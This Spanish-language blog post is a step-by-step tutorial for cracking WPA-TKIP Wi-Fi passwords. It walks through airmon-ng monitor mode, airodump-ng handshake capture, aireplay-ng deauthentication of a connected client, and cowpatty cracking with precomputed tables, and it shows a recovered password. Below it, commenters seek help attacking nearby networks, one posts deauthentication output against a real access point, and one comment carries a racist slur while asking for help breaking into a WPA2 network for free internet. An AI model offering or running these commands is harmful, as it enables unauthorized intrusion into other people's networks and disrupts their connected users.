Como Crackear una WPA con Rainbows Tables

Bueno el primer procesdimiento es mirar como se llama nuestra tarjeta de red inalambrica con el siguiente comando

#iwconfig

iwconfig1

En la imagen anterior podemos ver el nombre de mi tarjeta de red inlambrica es wlan0

ahora lo pondremos la tarjeta  en modo monitor con los siguintes dos comandos

#airmon-ng stop wlan0

#airmon-ng start wlan0

airmon2

Debe aparecer algo similar como en la  imagen anterior

ahora vamos a escanear las redes que estan a nuestro alcance

#airodum-ng wlan0

airodum29

En la imagen anterior podemos ver que a nuestro alcance hay un red wireles que tiene un tipo de encriptacion WPA-TKIP vamos anotar la MAC (BSSID) el nombre (ESSID) y el canal (CH)

Ahora usaremos airodum-ng para capturar el handshake

#airodump-ng –c 1 –bssid 00:A0:56:9A:18:FB –w prueba wlan0

1

Como vemos en la imagen anterior vemos que en el  AP hay  un cliente asociado entonces vamos  hacerle una desautenticacion al cliente que tiene conectado para nosotros poder capturar el handshake

#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0

3

2

En la parte superior de la imagen vemos que obtuvimos el handshake
Ahora procedemos a crackear la contraseña con el siguiente comando

#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

airodum6

En la imagen anterior podemos ver la velocidad de crackeo de una red con WPA y la password es JONATHAN

NOTA:

Para poder crackear la contraseña el SSID debe de ser el mismo de las Rainbows Tables me explico si el SSID es por ejemplo thomson y en las Rainbows Tables es Thomson no puede descifrar la contraseña.

En el siguinte link pueden descargar las Rainbows Tables y encontrar mas información

http://hak5.org/forums/index.php?showtopic=12708%3Cbr%3E

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.


Anuncios

22 comentarios to “Como Crackear una WPA con Rainbows Tables”

  1. Buen post, ahora solo necesitamos un cluster para precomputar unos SSIDs colombianos 😉

  2. hola tengo un problema empezado a intalar el programa batrark perdona por omerme letras pero estoy on el virtual linux q es donde lo tengo y no me deja esribir esa letra espero q lo entiendas mi problema es q pongo el primer omando y no me reonoe mi tarjeta Atheros AR 9285 eh busado en todos los foros pero nadie sabe nada a ver si me puedes deir a ver omo haer para q la reonoza o algo porq me estoy volviendo loa puede ser porq esta metido en un virtual el programa o porq linux no tiene los drivers a ver si me puedes dar alguna idea por favor

    • waldoredes Says:

      Hola si tienes una atheros en usb podes usar la maquina virtual pero si es PCI o PCI E tenes que iniciar linux desde tu maquina real y si tu linux que iniciastes no tiene instalado el driver entonces te paso el link para que tu lo instales
      http://linuxwireless.org/en/users/Drivers/ath9k
      Lo que tengo entendido es que apartir del kernel 2.6.29 tiene soporte para esta tarjeta cuando instales esto ya podras seguir el manual de como romper una red wifi.

      Espero que te sirva si tienes alguna duda comentas.

      • hola gracias la verda q se bastante poco de todo esto voy a seguir leyendo cosas porq tube q desistalar todo ya q no lo consguia y ademas soy super principiante en linux no tengo ni idea de como se instala los drivers ya te comentare gracias por tu respuesta ya q eres el unico q me a dicho algo porq sobre mi problema mucha gente pregunta pero nadie dice nada

  3. hola me da un error me gustaria mandarte una foto porq es q ya no se q puedo hacer a ver si me puedes ayudar por favor

  4. hola sigo tiendo problemas consigo q me deje conectarme a mi linea en linux pero no me dice el nombre de mi tarjeta me sale esto a ver si me puedes ayudar por favor

    eth0 Link encap:Ethernet HWaddr 08:00:27:ea:b9:d7
    inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
    inet6 addr: fe80::a00:27ff:feea:b9d7/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:4295 errors:56 dropped:0 overruns:0 frame:0
    TX packets:1583 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:5980675 (5.9 MB) TX bytes:117976 (117.9 KB)
    Interrupt:10 Base address:0xd020

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:4 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:200 (200.0 B) TX bytes:200 (200.0 B)

    root@bt:~# idconfig
    bash: idconfig: command not found
    root@bt:~# idd
    bash: idd: command not found
    root@bt:~# iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    root@bt:~# airmon-ng stop ath0

    Interface Chipset Driver

    root@bt:~# airmon-ng start ath0

    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    4954 dhclient

    Interface Chipset Driver

    root@bt:~#

  5. roberto Says:

    hola tengo una duda podras explicar de donde sacaste lo siguiente

    #cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

    -r seria nombre donde se capturan los archivos
    -s es el essid sino me equivoco
    pero
    -d EN ESTA ES NOSE DE DONDE LO SACAS

  6. Christian Says:

    Hola amigo no entiendo eso de rainbows Tables me podrias exlicar un poco mas y como se que Rainbows Tables puedo descargar y de donde?

  7. Christian Says:

    Hola amigo y como se que Rainbow Table tengo que descargar a mi me detecta varias redes con TKIP pero la verdad ni idea de como sacar el password aver si me das una amito 🙂 con esto.

  8. Christian Says:

    Hola Amigos Disculpa por no aver respondido antes estuve ocupado estos dias pues mira te paso una imagen del scaneo de red y me dices cual Rainbow Table tengo que descargar 🙂 aqui la imagen

  9. Christian Says:

    Y para el de Kevin no hay?

  10. Christian Says:

    waldoredes bro encontre el raimbows

    pero dime #cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

    es la ubicacion de la rambor seria haci

    #cowpatty -d /Escritorio/wap/Kevin -r prueba-01.cap -s Kevin

    me supongo?

    otra consulta sobre esto:

    #aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0

    y si esa red tiene varios cliente como se hace?

  11. Christian Says:

    aireplay-ng -0 1 -a 00:02:6F:6C:9F:E9 -c 00:1B:11:20:F0:07 wlan0
    14:04:23 Waiting for beacon frame (BSSID: 00:02:6F:6C:9F:E9) on channel 1
    14:04:24 Sending 64 directed DeAuth. STMAC: [00:1B:11:20:F0:07] [ 0| 0 ACK

    me sigue sin salir el handshake :S

    CH 1 ][ Elapsed: 3 mins ][ 2010-06-28 14:05

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

    00:02:6F:6C:9F:E9 -57 100 1570 556 0 1 11 . WPA TKIP PSK K

    BSSID STATION PWR Rate Lost Packets Probes

    00:02:6F:6C:9F:E9 00:1B:11:20:F0:07 -91 11 – 1 0 1

  12. Hola negro inmundo no he podido hackear una WPA2-psk
    y necesito internet.. enseñame enviame un correo con el manuel y con un diccionario full. para hacerlo en el bactrack.

  13. It’s amazing in favor of me to have a site, which is useful in support of my know-how. thanks admin

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: